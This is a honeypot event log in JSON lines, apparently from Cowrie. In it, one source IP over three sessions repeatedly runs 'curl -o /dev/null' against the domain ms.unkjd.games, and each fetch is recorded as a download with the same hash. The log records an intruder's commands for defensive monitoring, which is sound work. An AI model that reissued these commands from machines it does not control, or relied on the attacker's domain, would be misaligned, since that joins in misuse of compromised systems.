{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.041000Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.044476Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.046857Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.068264Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.072805Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.075569Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.079819Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.080397Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.086444Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.087039Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.090442Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.090982Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.115946Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.117634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.118829Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.119556Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.121709Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.122319Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.128234Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.128783Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.155506Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.157331Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.159301Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.159802Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.163130Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.165087Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.172075Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.172675Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.191111Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.191773Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.194896Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.197748Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.200671Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.201227Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.221945Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.222613Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.227265Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.228607Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.229259Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.233056Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.235606Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.236184Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.261045Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.261694Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.269767Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.270358Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.294090Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.294946Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.321984Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.325782Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.326524Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.330408Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.331050Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.334527Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.340156Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.358436Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.359204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.365453Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.366085Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.367666Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.368092Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.397370Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.398162Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.401713Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.403658Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.406434Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.407038Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.438041Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.441239Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.442548Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.443498Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.447758Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.448231Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.451478Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.452606Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.453277Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.459755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.486330Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.487041Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.493648Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.494251Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.500089Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.500705Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.527394Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:44.529268Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:44.531588Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
